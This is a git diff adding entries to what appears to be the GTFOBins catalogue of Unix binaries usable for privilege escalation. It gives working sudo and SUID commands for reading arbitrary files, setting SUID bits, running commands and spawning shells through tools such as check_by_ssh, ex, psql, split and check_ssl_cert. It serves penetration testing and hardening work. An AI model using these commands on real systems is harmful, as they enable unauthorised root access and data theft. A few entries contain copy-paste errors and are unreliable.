diff --git a/_gtfobins/basenc.md b/_gtfobins/basenc.md new file mode 100644 index 0000000..0a9f6ca --- /dev/null +++ b/_gtfobins/basenc.md @@ -0,0 +1,15 @@ +--- +functions: + file-read: + - code: | + LFILE=file_to_read + basenc --base64 $LFILE | basenc -d --base64 + suid: + - code: | + LFILE=file_to_read + basenc --base64 $LFILE | basenc -d --base64 + sudo: + - code: | + LFILE=file_to_read + sudo basenc --base64 $LFILE | basenc -d --base64 +--- diff --git a/_gtfobins/check_by_ssh.md b/_gtfobins/check_by_ssh.md new file mode 100644 index 0000000..5660689 --- /dev/null +++ b/_gtfobins/check_by_ssh.md @@ -0,0 +1,11 @@ +--- +description: | + This is the `check_by_ssh` Nagios plugin, available e.g. in `/usr/lib/nagios/plugins/`. +functions: + shell: + - description: The shell will only last 10 seconds. + code: check_by_ssh -o "ProxyCommand /bin/sh -i <$(tty) |& tee $(tty)" -H localhost -C xx + sudo: + - description: The shell will only last 10 seconds. + code: sudo check_by_ssh -o "ProxyCommand /bin/sh -i <$(tty) |& tee $(tty)" -H localhost -C xx +--- diff --git a/_gtfobins/check_cups.md b/_gtfobins/check_cups.md new file mode 100644 index 0000000..225e2ae --- /dev/null +++ b/_gtfobins/check_cups.md @@ -0,0 +1,13 @@ +--- +description: | + This is the `check_cups` Nagios plugin, available e.g. in `/usr/lib/nagios/plugins/`. The read file content is limited to the first line. +functions: + file-read: + - code: | + LFILE=file_to_read + check_cups --extra-opts=@$LFILE + sudo: + - code: | + LFILE=file_to_read + sudo check_cups --extra-opts=@$LFILE +--- diff --git a/_gtfobins/check_log.md b/_gtfobins/check_log.md new file mode 100644 index 0000000..40fd225 --- /dev/null +++ b/_gtfobins/check_log.md @@ -0,0 +1,21 @@ +--- +description: | + This is the `check_log` Nagios plugin, available e.g. in `/usr/lib/nagios/plugins/`. +functions: + file-read: + - code: | + LFILE=file_to_read + OUTPUT=output_file + check_log -F $LFILE -O $OUTPUT + cat $OUTPUT + file-write: + - code: | + LFILE=file_to_write + INPUT=input_file + check_log -F $INPUT -O $LFILE + sudo: + - code: | + LFILE=file_to_write + INPUT=input_file + sudo check_log -F $INPUT -O $LFILE +--- diff --git a/_gtfobins/check_memory.md b/_gtfobins/check_memory.md new file mode 100644 index 0000000..8ca90eb --- /dev/null +++ b/_gtfobins/check_memory.md @@ -0,0 +1,13 @@ +--- +description: | + This is the `check_memory` Nagios plugin, available e.g. in `/usr/lib/nagios/plugins/`. The read file content is limited to the first line. +functions: + file-read: + - code: | + LFILE=file_to_read + check_memory --extra-opts=@$LFILE + sudo: + - code: | + LFILE=file_to_read + sudo check_memory --extra-opts=@$LFILE +--- diff --git a/_gtfobins/check_raid.md b/_gtfobins/check_raid.md new file mode 100644 index 0000000..ef1e823 --- /dev/null +++ b/_gtfobins/check_raid.md @@ -0,0 +1,13 @@ +--- +description: | + This is the `check_raid` Nagios plugin, available e.g. in `/usr/lib/nagios/plugins/`. The read file content is limited to the first line. +functions: + file-read: + - code: | + LFILE=file_to_read + check_raid --extra-opts=@$LFILE + sudo: + - code: | + LFILE=file_to_read + sudo check_raid --extra-opts=@$LFILE +--- diff --git a/_gtfobins/check_ssl_cert.md b/_gtfobins/check_ssl_cert.md new file mode 100644 index 0000000..2401373 --- /dev/null +++ b/_gtfobins/check_ssl_cert.md @@ -0,0 +1,26 @@ +--- +description: | + This is the `check_by_ssh` Nagios plugin, available e.g. in `/usr/lib/nagios/plugins/`. +functions: + command: + - description: The host example.net must return a certificate via TLS + code: | + COMMAND=id + OUTPUT=output_file + TF=$(mktemp) + echo "$COMMAND | tee $OUTPUT" > $TF + chmod +x $TF + check_ssl_cert --curl-bin $TF -H example.net + cat $OUTPUT + sudo: + - description: The host example.net must return a certificate via TLS + code: | + COMMAND=id + OUTPUT=output_file + TF=$(mktemp) + echo "$COMMAND | tee $OUTPUT" > $TF + chmod +x $TF + umask 022 + check_ssl_cert --curl-bin $TF -H example.net + cat $OUTPUT +--- diff --git a/_gtfobins/check_statusfile.md b/_gtfobins/check_statusfile.md new file mode 100644 index 0000000..dbb297b --- /dev/null +++ b/_gtfobins/check_statusfile.md @@ -0,0 +1,13 @@ +--- +description: | + This is the `check_statusfile` Nagios plugi plugin, available e.g. in `/usr/lib/nagios/plugins/`. The read file content is limited to the first line. +functions: + file-read: + - code: | + LFILE=file_to_read + check_statusfile $LFILE + sudo: + - code: | + LFILE=file_to_read + sudo check_statusfile $LFILE +--- diff --git a/_gtfobins/chmod.md b/_gtfobins/chmod.md index 61e3361..0fc3dde 100644 --- a/_gtfobins/chmod.md +++ b/_gtfobins/chmod.md @@ -1,12 +1,12 @@ --- -description: This can be run with elevated privileges to change permissions and then read, write, or execute a file. +description: This can be run with elevated privileges to change permissions (`6` denotes the SUID bits) and then read, write, or execute a file. functions: suid: - code: | LFILE=file_to_change - ./chmod 0777 $LFILE + ./chmod 6777 $LFILE sudo: - code: | LFILE=file_to_change - sudo chmod 0777 $LFILE + sudo chmod 6777 $LFILE --- diff --git a/_gtfobins/column.md b/_gtfobins/column.md new file mode 100644 index 0000000..80a173c --- /dev/null +++ b/_gtfobins/column.md @@ -0,0 +1,17 @@ +--- +description: | + `column` expects textual data. +functions: + file-read: + - code: | + LFILE=file_to_read + column $LFILE + suid: + - code: | + LFILE=file_to_read + ./column $LFILE + sudo: + - code: | + LFILE=file_to_read + sudo column $LFILE +--- diff --git a/_gtfobins/comm.md b/_gtfobins/comm.md new file mode 100644 index 0000000..29551d9 --- /dev/null +++ b/_gtfobins/comm.md @@ -0,0 +1,15 @@ +--- +functions: + file-read: + - code: | + LFILE=file_to_read + comm $LFILE /dev/null 2>/dev/null + suid: + - code: | + LFILE=file_to_read + comm $LFILE /dev/null 2>/dev/null + sudo: + - code: | + LFILE=file_to_read + sudo comm $LFILE /dev/null 2>/dev/null +--- diff --git a/_gtfobins/csplit.md b/_gtfobins/csplit.md new file mode 100644 index 0000000..7b8927c --- /dev/null +++ b/_gtfobins/csplit.md @@ -0,0 +1,18 @@ +--- +functions: + file-read: + - code: | + LFILE=file_to_read + csplit $LFILE 1 + cat xx01 + suid: + - code: | + LFILE=file_to_read + csplit $LFILE 1 + cat xx01 + sudo: + - code: | + LFILE=file_to_read + csplit $LFILE 1 + cat xx01 +--- diff --git a/_gtfobins/ex.md b/_gtfobins/ex.md new file mode 100644 index 0000000..49ebb37 --- /dev/null +++ b/_gtfobins/ex.md @@ -0,0 +1,24 @@ +--- +functions: + shell: + - code: | + ex + !/bin/sh + file-write: + - code: | + ex file_to_write + a + DATA + . + w + q + file-read: + - code: | + ex file_to_read + ,p + q + sudo: + - code: | + sudo ex + !/bin/sh +--- diff --git a/_gtfobins/install.md b/_gtfobins/install.md new file mode 100644 index 0000000..a10c425 --- /dev/null +++ b/_gtfobins/install.md @@ -0,0 +1,14 @@ +--- +description: This can be run with elevated privileges to change permissions (`6` denotes the SUID bits) and then read, write, or execute a copy of the file. +functions: + suid: + - code: | + LFILE=file_to_change + TF=$(mktemp) + ./install -m 6777 $LFILE $TF + sudo: + - code: | + LFILE=file_to_change + TF=$(mktemp) + sudo install -m 6777 $LFILE $TF +--- diff --git a/_gtfobins/join.md b/_gtfobins/join.md new file mode 100644 index 0000000..50dff52 --- /dev/null +++ b/_gtfobins/join.md @@ -0,0 +1,15 @@ +--- +functions: + file-read: + - code: | + LFILE=file_to_read + join -a 2 /dev/null $LFILE + suid: + - code: | + LFILE=file_to_read + join -a 2 /dev/null $LFILE + sudo: + - code: | + LFILE=file_to_read + sudo join -a 2 /dev/null $LFILE +--- diff --git a/_gtfobins/nroff.md b/_gtfobins/nroff.md index f7fb52c..05d6b70 100644 --- a/_gtfobins/nroff.md +++ b/_gtfobins/nroff.md @@ -1,5 +1,10 @@ --- functions: + file-read: + - description: The file is typeset and some warning messages may appear. + code: | + LFILE=file_to_read + nroff $LFILE shell: - code: | TF=$(mktemp -d) diff --git a/_gtfobins/paste.md b/_gtfobins/paste.md new file mode 100644 index 0000000..dd84bcb --- /dev/null +++ b/_gtfobins/paste.md @@ -0,0 +1,15 @@ +--- +functions: + file-read: + - code: | + LFILE=file_to_read + paste $LFILE + suid: + - code: | + LFILE=file_to_read + paste $LFILE + sudo: + - code: | + LFILE=file_to_read + sudo paste $LFILE +--- diff --git a/_gtfobins/pr.md b/_gtfobins/pr.md new file mode 100644 index 0000000..a497a67 --- /dev/null +++ b/_gtfobins/pr.md @@ -0,0 +1,16 @@ +--- +description: Some bytes are altered so it might not be suitable for binary files. +functions: + file-read: + - code: | + LFILE=file_to_read + pr -T $LFILE + suid: + - code: | + LFILE=file_to_read + pr -T $LFILE + sudo: + - code: | + LFILE=file_to_read + pr -T $LFILE +--- diff --git a/_gtfobins/psql.md b/_gtfobins/psql.md new file mode 100644 index 0000000..40ca33f --- /dev/null +++ b/_gtfobins/psql.md @@ -0,0 +1,14 @@ +--- +description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply. +functions: + shell: + - code: | + psql + \? + !/bin/sh + sudo: + - code: | + psql + \? + !/bin/sh +--- diff --git a/_gtfobins/rev.md b/_gtfobins/rev.md new file mode 100644 index 0000000..4e27759 --- /dev/null +++ b/_gtfobins/rev.md @@ -0,0 +1,15 @@ +--- +functions: + file-read: + - code: | + LFILE=file_to_read + rev $LFILE | rev + suid: + - code: | + LFILE=file_to_read + ./rev $LFILE | rev + sudo: + - code: | + LFILE=file_to_read + sudo rev $LFILE | rev +--- diff --git a/_gtfobins/split.md b/_gtfobins/split.md new file mode 100644 index 0000000..297bdb1 --- /dev/null +++ b/_gtfobins/split.md @@ -0,0 +1,27 @@ +--- +functions: + file-read: + - code: | + LFILE=file_to_read + TF=$(mktemp) + split $LFILE $TF + cat $TF* + command: + - description: Command execution using an existing or newly created file. + code: | + COMMAND=id + TF=$(mktemp) + split --filter=$COMMAND $TF + - description: Command execution using stdin (and close it directly). + code: | + COMMAND=id + echo | split --filter=$COMMAND /dev/stdin + shell: + - description: The shell prompt is not printed. + code: | + split --filter=/bin/sh /dev/stdin + sudo: + - description: The shell prompt is not printed. + code: | + split --filter=/bin/sh /dev/stdin +--- diff --git a/_gtfobins/ss.md b/_gtfobins/ss.md new file mode 100644 index 0000000..62d863e --- /dev/null +++ b/_gtfobins/ss.md @@ -0,0 +1,17 @@ +--- +description: | + The file content is actually parsed so only a part of the first line is returned as a part of an error message. +functions: + file-read: + - code: | + LFILE=file_to_read + ss -a -F $LFILE + suid: + - code: | + LFILE=file_to_read + ./ss -a -F $LFILE + sudo: + - code: | + LFILE=file_to_read + sudo ss -a -F $LFILE +--- diff --git a/_gtfobins/ssh-keyscan.md b/_gtfobins/ssh-keyscan.md new file mode 100644 index 0000000..e113ca5 --- /dev/null +++ b/_gtfobins/ssh-keyscan.md @@ -0,0 +1,17 @@ +--- +description: | + The file content is actually parsed so only a part of each line is returned as a part of an error message. +functions: + file-read: + - code: | + LFILE=file_to_read + ssh-keyscan -f $LFILE + suid: + - code: | + LFILE=file_to_read + ./ssh-keyscan -f $LFILE + sudo: + - code: | + LFILE=file_to_read + sudo ssh-keyscan -f $LFILE +--- diff --git a/_gtfobins/tbl.md b/_gtfobins/tbl.md new file mode 100644 index 0000000..93ec6fa --- /dev/null +++ b/_gtfobins/tbl.md @@ -0,0 +1,17 @@ +--- +description: | + The read file content is corrupted by additional text at the beginning. +functions: + file-read: + - code: | + LFILE=file_to_read + tbl $LFILE + suid: + - code: | + LFILE=file_to_read + ./tbl $LFILE + sudo: + - code: | + LFILE=file_to_read + sudo tbl $LFILE +--- diff --git a/_gtfobins/troff.md b/_gtfobins/troff.md new file mode 100644 index 0000000..a48f957 --- /dev/null +++ b/_gtfobins/troff.md @@ -0,0 +1,17 @@ +--- +description: | + The file is typeset but text is still readable in the output, alternatively the output can be read with `man -l`. +functions: + file-read: + - code: | + LFILE=file_to_read + troff $LFILE + suid: + - code: | + LFILE=file_to_read + ./troff $LFILE + sudo: + - code: | + LFILE=file_to_read + sudo troff $LFILE +--- diff --git a/_gtfobins/xmodmap.md b/_gtfobins/xmodmap.md new file mode 100644 index 0000000..8d23cb1 --- /dev/null +++ b/_gtfobins/xmodmap.md @@ -0,0 +1,17 @@ +--- +description: | + The read file content is corrupted by error prints. +functions: + file-read: + - code: | + LFILE=file_to_read + xmodmap -v $LFILE + suid: + - code: | + LFILE=file_to_read + ./xmodmap -v $LFILE + sudo: + - code: | + LFILE=file_to_read + sudo xmodmap -v $LFILE +---